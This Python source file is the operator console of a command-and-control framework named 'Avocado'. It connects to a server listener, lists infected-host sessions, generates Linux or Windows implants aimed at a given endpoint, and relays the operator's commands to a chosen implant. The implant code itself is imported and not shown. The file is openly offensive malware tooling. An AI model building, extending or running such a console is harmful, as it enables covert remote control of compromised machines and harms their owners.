#!/usr/bin/env python3
import threading
from client.rpc_client.rpc_client import RPCClient
from client.generate.generate import generate
from queue import Queue
from client.util.util import parseEndpoint

class Operator:
    def __init__(self):
        hostname, port = parseEndpoint(input("Enter Server Operator Listener Address (Example: 172.17.0.2:31337)\n> "))

        implantq = Queue()
        outputq = Queue()

        self._rpc_client = RPCClient(hostname, port, outputq, implantq)

        # _output_received is a workaround for i/o issue
        # i.e. the server response overwrites the user input prompt
        self._output_received = threading.Event()  
        self._output_received.set()  

        self._sessions = []

        threading.Thread(target=self._implant_handler, args=(implantq,)).start()
        threading.Thread(target=self._output_handler, args=(outputq,)).start()
        threading.Thread(target=self._input_handler, args=("Avocado",)).start()

    # handle new implants
    def _implant_handler(self, implantq):
        while True:
            new_implant = implantq.get()

            if new_implant:
                self._sessions.append(new_implant.id)

            else:
                break

    # prints output messages received from the server
    def _output_handler(self, outputq):
        while True:
            output = outputq.get()

            if not output:
                break

            else:
                print(output[0])

            self._output_received.set() 

    def _input_handler(self, title, session_id=None):
        while True:
            self._output_received.wait()

            msg = input(f"[{title}] > ")

            if not msg:
                continue

            elif (session_id):
                self._rpc_client.sendSession(msg, session_id)
                self._output_received.clear()  

            else:
                command = msg.split()

                if command[0] == "sessions":
                    for s in self._sessions:
                        print(s)

                elif command[0] == "generate":
                    if len(command) != 3 or (command[2] != "linux" and command[2] != "windows"):
                        print("Usage: generate <endpoint> linux|windows")
                    else:
                        print("Generating the implant...")

                        generate(command[1], command[2])

                elif command[0] == "use":
                    if command[1] not in self._sessions:
                        print("Session doesn't exist")

                    elif len(command) == 2:
                        self._input_handler(command[1], command[1]) 

                    else:
                        print(b"Usage: use <session>")

            if msg.lower() == "exit":
                print(f"[+]{title} Terminated")

                if title=="Avocado":
                    self._rpc_client.terminate()

                break


if __name__ == "__main__":
    Operator()
